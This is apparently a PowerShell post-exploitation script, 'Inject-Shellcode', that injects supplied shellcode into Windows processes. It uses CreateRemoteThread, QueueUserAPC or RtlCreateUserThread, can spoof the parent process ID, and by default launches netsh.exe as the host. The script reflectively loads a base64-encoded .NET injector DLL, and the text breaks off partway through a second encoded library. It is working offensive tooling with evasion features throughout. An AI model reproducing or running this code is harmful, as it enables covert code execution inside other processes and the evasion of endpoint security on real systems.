function Inject-Shellcode ([switch]$x86, [switch]$x64, $ParentID, [switch]$RTLCreateUserThread, [switch]$QueueUserAPC,[switch]$Force, [switch]$Suspended, [Parameter(Mandatory=$true)]$Shellcode, $ProcID, $ProcPath, $ProcessName, $ProcName) { <# .SYNOPSIS Inject-Shellcode using many different methods Author: @benpturner Methods: + QueueUserAPC + CreateRemoteThread + RTLCreateUserThread .DESCRIPTION Injects shellcode into x86 or x64 bit processes. Tested on Windowns 7 32 bit, Windows 7 64 bit and Windows 10 64bit. .EXAMPLE CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 .EXAMPLE CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> OpenThread -> QueueUserAPC -> ResumeThread Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 -QueueUserAPC .EXAMPLE CreateProcess(SPOOFED PPID) -> VirtualAllocEx -> WriteProcessMemory -> RTLCreateUserThread Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ParentID 4502 -RTLCreateUserThread .EXAMPLE OpenProcess(CUSTOM PID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 5634 .EXAMPLE CreateProcess(CUSTOM ProcPath) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessPath C:\Windows\System32\notepad.exe .EXAMPLE OpenProcess(CUSTOM ProcessName) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcessName notepad.exe .EXAMPLE OpenProcess(CUSTOM ProcID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread -> X64 -> x86 Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 1242 -x86 .EXAMPLE OpenProcess(CUSTOM ProcID) -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread -> X86 -> x64 Inject-Shellcode -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -ProcID 1242 -x64 #> if($ProcName){ $ProcessName = $ProcName } if($ProcPath){ $ProcessPath = $ProcPath } else { $ProcessPath = "C:\Windows\system32\netsh.exe" } $p = "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agBjAXMAagCDAXMAagCjAXMAagADAM4AGQDOACkAzgAzAM4AfQDOABoAWwBeAAEGAQAjBg4GAAEDAAwIAQBAAQUAhwMBAEABBwAJCQEAQAEJAOsIAQBAAQsACwMBAAABEQBuAAEAAAETAGsJAQAAARUAXAkBAAABFwCbAgEAAAEZAJEJAQAAARsAgwkBAAABHQAjCAEAAAEfAC8IAQAAASEACwMBAAABIwC2AgEAAAElAIACAQAAAScAjgIBAAYBKQD7AgEAQwErAEEIAgAAAi0AfAkDAAABLwDBAgQAQAExAAwIAQAEgAAAAQAAAAAAAAAAAAAAAACICAAAAgAAAAAAAAAAAAAAYQApAgAAAAACAAAAAAAAAAAAAABhADMGAAAAAAcABQAIAAUACQAFAAoABQALAAYADAAGAA0ABgAAAAAAAGtlcm5lbDMyAFRIUkVBRF9TRVRfQ09OVEVYVDIAY2JSZXNlcnZlZDIAbHBSZXNlcnZlZDIAVEhSRUFEX1NFVF9DT05URVhUMwBUSFJFQURfU0VUX0NPTlRFWFQ0ADxNb2R1bGU+AHBmbkFQQwBRdWV1ZVVzZXJBUEMARVhFQ1VURV9SRUFEAFNVU1BFTkRfUkVTVU1FAFRFUk1JTkFURQBJTVBFUlNPTkFURQBQQUdFX1JFQURXUklURQBFWEVDVVRFX1JFQURXUklURQBFWEVDVVRFAE1FTV9SRVNFUlZFAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFNFVF9USFJFQURfVE9LRU4AUFJPQ0VTU19JTkZPUk1BVElPTgBTRVRfSU5GT1JNQVRJT04AUVVFUllfSU5GT1JNQVRJT04ARElSRUNUX0lNUEVSU09OQVRJT04AVE9QX0RPV04AU1RBUlRVUElORk8ATEFSR0VfUEFHRVMAU0VDVVJJVFlfQVRUUklCVVRFUwBOT0FDQ0VTUwBUSFJFQURfQUxMX0FDQ0VTUwBQUk9DRVNTX0FMTF9BQ0NFU1MAUkVTRVQATUVNX0NPTU1JVABHRVRfQ09OVEVYVABUSFJFQURfU0VUX0NPTlRFWFQAU1RBUlRVUElORk9FWABkd1gAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAZHdZAHZhbHVlX18AZHdEYXRhAGNiAG1zY29ybGliAHNyYwBscFRocmVhZElkAGR3VGhyZWFkSWQAcGFyZW50UHJvY2Vzc0lkAGR3UHJvY2Vzc0lkAENsaWVudElkAEdldFByb2Nlc3NCeUlkAFN1c3BlbmRUaHJlYWQAUmVzdW1lVGhyZWFkAENyZWF0ZVJlbW90ZVRocmVhZABoVGhyZWFkAE9wZW5UaHJlYWQAUnRsQ3JlYXRlVXNlclRocmVhZABDcmVhdGVTdXNwZW5kZWQAbHBSZXNlcnZlZABnZXRfSGFuZGxlAEdldE1vZHVsZUhhbmRsZQBDbG9zZUhhbmRsZQBiSW5oZXJpdEhhbmRsZQBscFRpdGxlAGhNb2R1bGUAcHJvY05hbWUAbHBNb2R1bGVOYW1lAGxwQXBwbGljYXRpb25OYW1lAGxwQ29tbWFuZExpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUAVXBkYXRlUHJvY1RocmVhZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBscFZhbHVlAGxwUHJldmlvdXNWYWx1ZQBkd1hTaXplAGR3WVNpemUAZ2V0X1NpemUAY2JTaXplAENvbW1pdHRlZFN0YWNrU2l6ZQBNYXhpbXVtU3RhY2tTaXplAGR3U3RhY2tTaXplAGxwUmV0dXJuU2l6ZQBscFNpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBuTGVuZ3RoAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAGtlcm5lbDMyLmRsbABudGRsbC5kbGwASW5qZWN0LmRsbABtc3ZjcnQuZGxsAEZpbGwAU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBwRGVzdGluYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGxwQnVmZmVyAFBQSURTcG9vZmVyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgBUaHJlYWRTZWN1cml0eURlc2NyaXB0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAV3JpdGVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQcm9jZXNzQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAVGhyZWFkQWNjZXNzAGR3RGVzaXJlZEFjY2VzcwBDcmVhdGVQcm9jZXNzAGhQcm9jZXNzAE9wZW5Qcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAEdldFByb2NBZGRyZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAFplcm9CaXRzAGhPYmplY3QASW5qZWN0AGxwZmxPbGRQcm90ZWN0AGZsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAbHBFbnZpcm9ubWVudABkd0F0dHJpYnV0ZUNvdW50AGNvdW50AGRlc3QARGVsZXRlUHJvY1RocmVhZEF0dHJpYnV0ZUxpc3QASW5pdGlhbGl6ZVByb2NUaHJlYWRBdHRyaWJ1dGVMaXN0AGxwQXR0cmlidXRlTGlzdABoU3RkSW5wdXQAaFN0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" $dl = [System.Convert]::FromBase64String($p) $a = [System.Reflection.Assembly]::Load($dl) $o = New-Object Inject echo "" echo "[+] Inject-Shellcode" echo "" if ($x86.IsPresent -and (!$procpath)) { if ($env:PROCESSOR_ARCHITECTURE -eq "x86"){ $ProcessPath = "C:\Windows\System32\netsh.exe" } else { $ProcessPath = "C:\Windows\Syswow64\netsh.exe" } } if ($Suspended.IsPresent) { $SuspendedState = $true } else { $SuspendedState = $false } if ($ProcessName) { $Process = [System.Diagnostics.Process]::GetProcessesByName($ProcessName) } elseif ($ProcID){ echo "Using ProcID" $Process = [System.Diagnostics.Process]::GetProcessById($ProcID) $injectpid = $ProcID } else { if (($SuspendedState) -and ($ParentID)) { $Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $true) echo "[+] Parent Spoofing $ParentID & New Suspended Process: $ProcessPath" $injectpid = $Success.dwProcessId $injectpiddwThreadID = $Success.dwThreadID $injectpidhThread = $Success.hThread } elseif ((!$SuspendedState) -and ($ParentID)) { $Success = [PPIDSpoofer]::CreateProcess($ParentID, $ProcessPath, $false) echo "[+] Parent Spoofing $ParentID & New Process: $ProcessPath" $injectpid = $Success.dwProcessId $injectpiddwThreadID = $Success.dwThreadID $injectpidhThread = $Success.hThread } elseif (($SuspendedState) -and (!$ParentID)) { $Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $true) echo "[+] New Suspended Process: $ProcessPath" $injectpid = $Success.dwProcessId $injectpiddwThreadID = $Success.dwThreadID $injectpidhThread = $Success.hThread } else { $Success = [PPIDSpoofer]::CreateProcess(0, $ProcessPath, $false) echo "[+] New Process: $ProcessPath" $injectpid = $Success.dwProcessId $injectpiddwThreadID = $Success.dwThreadID $injectpidhThread = $Success.hThread } } $ProcessIDVal = $injectpid $ProcessX86 = IsProcess-x86 $ProcessIDVal $Proceed = $false $64to32 = $false if (($x86.IsPresent) -and ($ProcessX86)) { echo "[+] Running against x86 process with ID: $ProcessIDVal" $Proceed = $true } elseif (($env:PROCESSOR_ARCHITECTURE -eq "x86") -and ($ProcessX86)) { echo "[+] Running against x86 process with ID: $ProcessIDVal" $Proceed = $true } elseif ($ProcessX86) { echo "[-] x86 process identified, use -x86 or this could crash the process" echo "If you believe this is wrong use -Force to try injection anyway - use at own risk" $Proceed = $false } else { echo "[+] Running against x64 process with ID: $ProcessIDVal" $Proceed = $true $64to32 = $true } $CurrentProcX86 = IsProcess-x86 $PID if ($CurrentProcX86) { echo "[+] Current process arch is x86: $PID" if ($64to32) { # https://github.com/Coder666/Invoke-CreateRemoteThread64/blob/master/Invoke-CreateRemoteThread64.ps1 # Author: TomW (Coder666) # [Thread.Util]::CreateRemoteThread64() $lib = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAOOJ8lsAAAAAAAAAAOAAAiELAQsAABYAAAAGAAAAAAAAbjQAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABQ0AABXAAAAAEAAADgDAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAADcMgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdBQAAAAgAAAAFgAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAADgDAAAAQAAAAAQAAAAYAAA